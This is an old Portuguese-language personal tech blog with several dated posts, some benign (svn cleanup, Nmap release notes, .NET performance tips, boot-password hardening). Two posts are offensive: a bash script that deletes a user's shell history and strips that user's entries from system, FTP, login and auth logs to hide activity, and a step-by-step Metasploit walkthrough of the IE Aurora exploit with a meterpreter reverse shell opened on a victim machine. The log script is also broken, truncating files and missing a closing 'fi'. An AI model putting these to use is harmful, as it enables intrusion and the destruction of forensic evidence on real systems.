terça-feira, 23 de março de 2010
Ruby on Rails para Javaneses
domingo, 21 de março de 2010
Apagando arquivos de Log
Segue código:
#!/bin/bash
USUARIO=$1
IP=$2
MESSAGES=/var/log/messages
FTP=/var/log/vsftpd.log
LOGIN=/var/log/wtmp
AUTH=/var/log/auth.log
if [ $# -lt 1 ] ; then
echo "uso: clean usuario [arquivo]"
exit;
fi
if [ $USUARIO == root ] ; then
echo "deletando /root/.bash_history"
rm -f /root/.bash_history
else
echo "deletando /home/"$USUARIO"/.bash_history"
rm -f /home/$USUARIO/.bash_history
fi
echo "Limpando entradas em" $MESSAGES "que correspondem ao usuario" $USUARIO
cat $MESSAGES | grep -v $USUARIO > $MESSAGES
echo "Limpando entradas em" $FTP "que correspondem ao usuario" $USUARIO
cat $FTP | grep -v $USUARIO > $FTP
echo "Limpando entradas em" $LOGIN "que correspondem ao usuario" $USUARIO
cat $LOGIN | grep -v $USUARIO > $LOGIN
echo "Limpando entradas em" $AUTH "que correspondem ao usuario" $USUARIO
cat $AUTH | grep -v $USUARIO > $AUTH
if [ $# == 2 ] ; then
echo "Limpando linhas em "$AUTH "que correspondem a" $2
cat $AUTH | grep -v $2 > $AUTH
O que o script faz é o seguinte:
primeiro ele apaga .bash_history no diretório:
/root - caso o usuário especificado como parametro seja root.
/home/usuario - caso usuário passado como parametro seja diferente de root.
/var/log/messages - registrar todas as operações do sistema ou de programas do mesmo.
/var/log/vsftpd.log - registrar todas as operações logon/logoff realizadas pelo daemon de ftp.
/var/log/wtmp - registrar os logons de usuários. É um arquivo binário que trabalha em conjunto com a função who para a identificação do usuário.
/var/log/auth.log - Registra operações de autenticações.
giorge#: clean root /var/log/dmesg
Abraços
Giorge Henrique Abdala Leia Mais…
quinta-feira, 11 de fevereiro de 2010
Apagar todas as pastas .svn
$ rm -rf `find . -type d -name .svn`
svn export DESTINO
Giorge Henrique Abdala Leia Mais…
sexta-feira, 22 de janeiro de 2010
Lançado Nmap 5.20
Confira as novidades:
30 novos engine scripts adicionados.
melhor desempenho e consumo de memória reduzido.
Protocolo específico de payload para scanners UDP mais efetivos.
engine traceroute completamente reescrita.
Update das assinaturas para detecção de versões de SO e Bancos de dados (mais de 10.000 assinaturas)
Download aqui.
Giorge Henrique Abdala
Dicas para melhorar a performance do .Net Compact Framework
Código a ser evitado:
String str = "string inicial";
for (int i = 0; i < 1000; i++) {
str += "String concatenada";
}
Código a ser usado:
StringBuilder str = new StringBuilder();
for (int i = 0; i < 1000; i ++) {
str.Append("String concatenada");
}
//classe que irá gerenciar o web service
public static class WebService() {
//instância do web service
private static WSCorreios www = null;
//método estático usado para pegar a instância do Web Service.
public static getWSCorreios() {
if (www == null)
www = new WSCorreios();
return www;
}
}
//classe que irá usar o WebService
public class usarWS() {
//construtor
public usarWS() {
}
//pega a instância do Web Service
WSCorreios www = WebService.getWSCorreios();
//usa métodos do Web Service
www.getCep();
}
}
int[] Lista = new int[100000];
for(int i = 0; i < 100000; i++) {
Lista[i] = i;
}
Melhor maneira para guardar coleções de objetos:
List Lista = new List(100000);
for(int i = 0; i < 100000; i++) {
Lista.Add(i);
}
Pior maneira para guardar qualquer coisa:
ArrayList Lista = new ArrayList(100000);
for(int i = 0; i < 100000; i++) {
Lista.Add(i);
}
####################
Referência:
http://msdn.microsoft.com/en-us/library/1766918e.aspx
http://msdn.microsoft.com/en-us/library/ms172524.aspx
Giorge Henrique Abdala
Leia Mais…
quinta-feira, 21 de janeiro de 2010
Lançado novo ProcNetMonitor
Giorge Henrique Abdala Leia Mais…
terça-feira, 19 de janeiro de 2010
Internet Explorer Aurora Exploit
para usa é fácil. É necessário ter o phyton defidamente instalado.
Windows/Linux:$ python ie_aurora.py 8080
[-] Web server is running at http://
127.0.0.1:8080/
onde:
8080 - porta local
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
msf exploit(ie_aurora) >
O payload usado abre uma conexão reversa no alvo. Em seguida abra o IE e acesse o endereço mostrado (http://192.168.0.151:8080/).
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
Pronto. Você já tem acesso shell disponível no alvo.
################
Referências:
http://www.microsoft.com/technet/security/advisory/979352.mspx
Giorge Henrique Abdala Leia Mais…
quinta-feira, 14 de janeiro de 2010
TCC Metasploit
Esse achei na net há pouco tempo. É um TCC produzido pelo Julio Cesar Liviero Della Flora para a UniFil de londrina. É um trabalho muito bem estruturado, com explicações e várias imagens. Ponto de partida para qualquer um que deseja iniciar na área de testes de vulnerabilidades.
http://www.4shared.com/file/164179969/d59dfd55/TCC_JULIO.html
PS: não é pirataria. O trabalho foi disponibilizado na rede pelo próprio autor.
Giorge Henrique Abdala
Impedindo o Acesso sem senha
As maneiras mais conhecidas para entrar no sistema sem senha são:
1. disquete de boot.
2. trocando o runlevel para 1 (Single ou manutenção).
3. Trocando o runlevel para `init=/bin/bash`.
1. Edite o /etc/inittab e verifique se existe uma linha parecida com:
su:S:wait:/etc/rc.d/rc.sulogin
sulogin -p
*/Para forçar o sistema a pedir a senha root sempre que for iniciado no modo manutenção*/
#grub
*/criptografa uma senha ser usada no grub*/
grub> md5crypt
*/digite a senha a ser criptografada*/
password: *********
A saída do comando será a senha criptografada, algo como:
encrypted: $1$2atu01$qdxmcgaxxw0pehytdvixo.
Edite o arquivo /boot/grub/menu.lst, e adicione, no início do arquivo, a seguinte linha:
password = --md5
A Opção de senha também pode ser usada com o Lilo.
* info grub, man lilo
* GRUB
* Lilo HOWTO
Giorge Henrique Abdala
Leia Mais…
Novo repositório de exploits
O novo repositório contém as mesmas categorias que o milw0rm (remote, local, web, dos e shellcode) e, aparentemente, está bem atualizado, contando, hoje, com 10309 exploits.
usem com moderação: http://www.exploit-db.com/
Giorge Henrique Abdala Leia Mais…